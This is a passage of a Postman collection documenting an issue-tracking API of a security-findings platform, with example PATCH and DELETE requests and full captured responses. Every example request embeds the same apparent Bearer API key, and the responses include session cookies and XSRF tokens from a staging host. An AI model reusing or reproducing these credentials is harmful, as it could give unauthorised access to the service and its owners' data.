cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node07vjx6k549ff0rjogzccyt85s8475.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"405bce87-dd33-4f48-8f12-3009ebf31c78","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"language\": \"en\",\n    \"title\": \"Responder e se recuperar de um Incidente de Segurança e Privacidade\",\n    \"description\": \"[Seção III | Art. 7°§Único] A natureza de um Incidente declarado é que a organização já incorreu algum efeito, embora limitado, requer que a organização atue no Incidente.\",\n    \"severity\": 0,\n    \"asset\": \"5d0a0519c569d5014335b258\",\n    \"protocol\": \"tcp\",\n    \"status\": \"PENDING\",\n    \"responsible\": \"5ab548ebe12f5e056e329776\",\n    \"issue_id\": \"5d0a0519c569d5025016ec2b\",\n    \"id_gat_detail\": 2685,\n    \"cvss_v3_score\": 0,\n    \"root_cause\": \"5cc36719c569d57711bf2f09\",\n    \"creation_date\": \"2019-06-19T06:49:13\",\n    \"last_seen_date\": \"2019-06-19T06:49:13\"\n}"},{"id":"d67298e7-72a9-494d-b791-29ed1a5db454","name":"Missing Severity","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"asset\": {\n\t\t\"asset_id\": \"5d091b89c569d501433592e9\"\n\t},\n\t\"title\": \"Definir a Gestão dos Ativos de Informação\"\n}"},"url":"https://subdomain.gat.digital/api/v1/issues"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 13:06:38 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node013os3nxikfycs160oiosezgfjk9406.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0w3fnhe2xuw526fdsmlqpqsoi9421.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=01b1212e-0b78-40a9-bca9-56cd76128090;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0w3fnhe2xuw526fdsmlqpqsoi9421.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"01b1212e-0b78-40a9-bca9-56cd76128090","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"error\":\"Malformed request bod\",\"error_key\":\"error.null.params\"}"}],"_postman_id":"dbd628bc-41b0-41d0-aed3-595c2e0be130"},{"name":"Update an Issue","id":"000c58dd-7cb4-40fc-b8f5-2c6c78a3a828","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"body":{"mode":"formdata","formdata":[{"key":"severity","value":"Int","description":"<p>Integer from 0 to 4. If not set, it defaults to 0.</p>\n","type":"text"},{"key":"category","value":"List<String>","description":"<p>List of Category IDs. It will override the existing Categories on the Issue.</p>\n","type":"text"},{"key":"cvss_v3_score","value":"Float","description":"<p>The CVSS v3 Score.</p>\n","type":"text"},{"key":"due_date","value":"String","description":"<p>A date in the format \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"mitigation","value":"List<String>","description":"<p>List of Mitigation IDs. It will override the existing Mitigations on the Issue.</p>\n","type":"text"},{"key":"protocol","value":"String","description":"<p>The protocol this Issue affects.</p>\n","type":"text"},{"key":"port","value":"Int","description":"<p>The Port number this Issue affects.</p>\n","type":"text"},{"key":"recommendation","value":"List<String>","description":"<p>List of Recommendation IDs. It will override the existing Recommendations on the Issue.</p>\n","type":"text"},{"key":"responsible","value":"String","description":"<p>User ID that is responsible for the Issue.</p>\n","type":"text"},{"key":"root_cause","value":"String","description":"<p>Root Cause ID.</p>\n","type":"text"},{"key":"status","value":"String","description":"<p>\"PENDING\", \"REOPENED\", \"RETEST\", \"TREATMENT\", \"FIXED\", \"ACCEPT\" or \"NONEXISTENT\".</p>\n","type":"text"},{"key":"tag","value":"List<String>","description":"<p>List of Tags. It will override the existing Tags on the Issue.</p>\n","type":"text"},{"key":"test","value":"List<String>","description":"<p>List of Test IDs. It will override the existing Tests on the Issue.</p>\n","type":"text"},{"key":"watcher","value":"List<String>","description":"<p>List of User IDs that will become Watchers on this Issue. It will override the existing Watchers on the Issue.</p>\n","type":"text"}]},"url":"https://<instance>/api/v1/issues/<issue_id>","description":"<p>This endpoint allows you to update a given Issue. Notice that not all fields can be updated.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"49b34b22-c976-4146-9598-83d2c7c4ab72","id":"49b34b22-c976-4146-9598-83d2c7c4ab72","name":"Apontamentos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v1","issues","<issue_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"531e55be-d5b3-4f32-8c4d-c31ab72bd06d","name":"Try to change KB ID","originalRequest":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"kb_id\": \"5ab9178fe12f5e05704b906f\"\n}"},"url":"https://subdomain.gat.digital/api/v1/issues/5d03b910c569d5025016e7d2"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 13:25:01 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0kru91q3r2vfg1qmrzmu6eypqt9852.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node010a1qyf4j2xr4pq3sx50rx97q9880.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=ce7f63a3-a5de-4bac-8669-a7e504caad62;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node010a1qyf4j2xr4pq3sx50rx97q9880.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"ce7f63a3-a5de-4bac-8669-a7e504caad62","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n\t\"error\": \"Unable to update this field.\"\n}"},{"id":"14a7d7c1-a5b4-46bd-b379-22f4b800e3b9","name":"Change Issue Severity","originalRequest":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"severity\": 3\n}"},"url":"https://subdomain.gat.digital/api/v1/issues/5d03b910c569d5025016e7d2"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","name":"Content-Type","value":"application/json","description":"The mime type of this content","type":"text"},{"key":"Date","value":"Wed, 19 Jun 2019 13:23:04 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node017bvqyjry855aj9joqd5rtckx9743.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01r9io14iad1g9olclrts8e0mt9823.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=477d7507-585e-40c5-85bd-1f3b60f00e33;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01r9io14iad1g9olclrts8e0mt9823.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"477d7507-585e-40c5-85bd-1f3b60f00e33","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"language\": \"en\",\n    \"title\": \"New title\",\n    \"description\": \"\\nUsing a combination of remote probes (e.g., TCP/IP, SMB, HTTP, NTP, SNMP, etc.), it is possible to guess the name of the remote operating system in use. It is also possible sometimes to guess the version of the operating system.\",\n    \"severity\": 3,\n    \"asset\": \"5d03b90cc569d5025016e4cb\",\n    \"port\": 0,\n    \"protocol\": \"tcp\",\n    \"status\": \"NONEXISTENT\",\n    \"categories\": [\n        \"5b48a6fee12f5edae60cf6e6\"\n    ],\n    \"issue_id\": \"5d03b910c569d5025016e7d2\",\n    \"id_gat_detail\": 2685,\n    \"cvss_v3_score\": 0,\n    \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n    \"creation_date\": \"2017-09-18T03:40:12\",\n    \"last_seen_date\": \"2017-09-18T03:40:12\",\n    \"update_date\": \"2019-06-19T10:23:04\"\n}"},{"id":"56219ce9-a569-411b-9359-09b71564e528","name":"Add a Responsible","originalRequest":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"responsible\": \"5ab548ebe12f5e056e329776\"\n}"},"url":"https://subdomain.gat.digital/api/v1/issues/5d03b910c569d5025016e7d2"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","name":"Content-Type","value":"application/json","description":"The mime type of this content","type":"text"},{"key":"Date","value":"Wed, 19 Jun 2019 13:23:39 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01r9io14iad1g9olclrts8e0mt9823.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01s209r44q1pqs111kadl59pfwo9840.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=5e545e4d-1e5e-4e0e-864b-01b2a7e3f822;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01s209r44q1pqs111kadl59pfwo9840.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"5e545e4d-1e5e-4e0e-864b-01b2a7e3f822","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"language\": \"en\",\n    \"title\": \"New title\",\n    \"description\": \"\\nUsing a combination of remote probes (e.g., TCP/IP, SMB, HTTP, NTP, SNMP, etc.), it is possible to guess the name of the remote operating system in use. It is also possible sometimes to guess the version of the operating system.\",\n    \"severity\": 3,\n    \"asset\": \"5d03b90cc569d5025016e4cb\",\n    \"port\": 0,\n    \"protocol\": \"tcp\",\n    \"status\": \"NONEXISTENT\",\n    \"categories\": [\n        \"5b48a6fee12f5edae60cf6e6\"\n    ],\n    \"responsible\": \"5ab548ebe12f5e056e329776\",\n    \"issue_id\": \"5d03b910c569d5025016e7d2\",\n    \"id_gat_detail\": 2685,\n    \"cvss_v3_score\": 0,\n    \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n    \"creation_date\": \"2017-09-18T03:40:12\",\n    \"last_seen_date\": \"2017-09-18T03:40:12\",\n    \"update_date\": \"2019-06-19T10:23:39\"\n}"},{"id":"a6a70737-c255-40ab-b182-ca0ac699537b","name":"Change the Status","originalRequest":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"status\": \"PENDING\"\n}"},"url":"https://subdomain.gat.digital/api/v1/issues/5d03b910c569d5025016e7d2"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","name":"Content-Type","value":"application/json","description":"The mime type of this content","type":"text"},{"key":"Date","value":"Wed, 19 Jun 2019 13:24:09 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01s209r44q1pqs111kadl59pfwo9840.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0kru91q3r2vfg1qmrzmu6eypqt9852.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=c90b905b-edd4-4b8b-81fe-93efa966920e;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0kru91q3r2vfg1qmrzmu6eypqt9852.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"c90b905b-edd4-4b8b-81fe-93efa966920e","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"language\": \"en\",\n    \"title\": \"New title\",\n    \"description\": \"\\nUsing a combination of remote probes (e.g., TCP/IP, SMB, HTTP, NTP, SNMP, etc.), it is possible to guess the name of the remote operating system in use. It is also possible sometimes to guess the version of the operating system.\",\n    \"severity\": 3,\n    \"asset\": \"5d03b90cc569d5025016e4cb\",\n    \"port\": 0,\n    \"protocol\": \"tcp\",\n    \"status\": \"PENDING\",\n    \"categories\": [\n        \"5b48a6fee12f5edae60cf6e6\"\n    ],\n    \"responsible\": \"5ab548ebe12f5e056e329776\",\n    \"issue_id\": \"5d03b910c569d5025016e7d2\",\n    \"id_gat_detail\": 2685,\n    \"cvss_v3_score\": 0,\n    \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n    \"creation_date\": \"2017-09-18T03:40:12\",\n    \"last_seen_date\": \"2017-09-18T03:40:12\",\n    \"update_date\": \"2019-06-19T10:24:09\"\n}"}],"_postman_id":"000c58dd-7cb4-40fc-b8f5-2c6c78a3a828"},{"name":"Delete given Issues","id":"ea7f342d-01b4-4c69-8cfc-a9b3d47d75c4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Content","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"body":{"mode":"formdata","formdata":[{"key":"id","value":"List<String>","description":"<p>List of Issue IDs to be deleted.</p>\n","type":"text"}]},"url":"https://<instance>/api/v1/issues","description":"<p>This endpoint allows you to Delete one or more Issues.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"49b34b22-c976-4146-9598-83d2c7c4ab72","id":"49b34b22-c976-4146-9598-83d2c7c4ab72","name":"Apontamentos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v1","issues"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"470a955f-0686-47ea-8794-1cebe7203762","name":"Some Issue IDs were not found","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Content","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"id\": [\"5d0a0e59c569d5025016ec41\", \"5d0a11cac569d50000000000\"]\n}"},"url":"https://subdomain.gat.digital/api/v1/issues"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 13:32:55 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0693ehg2v2fk91xdotfhbh6ejm9930.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01ugj000ae563tjv96mfesxgl9964.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=32eafc8a-ae60-424b-b84c-d5446d03e780;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01ugj000ae563tjv96mfesxgl9964.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"32eafc8a-ae60-424b-b84c-d5446d03e780","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"deleted\":1,\"deleted_ids\":[\"5d0a0e59c569d5025016ec41\"],\"not_deleted\":0}"},{"id":"083a8bc6-0236-47a2-9540-fd79a9da7382","name":"Delete given Issues","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Content","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"id\": [\"5d0a332fc569d5025016ec59\", \"5d0a11cac569d5025016ec4e\"]\n}"},"url":"https://subdomain.gat.digital/api/v1/issues"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 13:31:34 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node010a1qyf4j2xr4pq3sx50rx97q9880.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0693ehg2v2fk91xdotfhbh6ejm9930.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=75198258-b821-42f9-8c76-fdb4cdcad252;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy 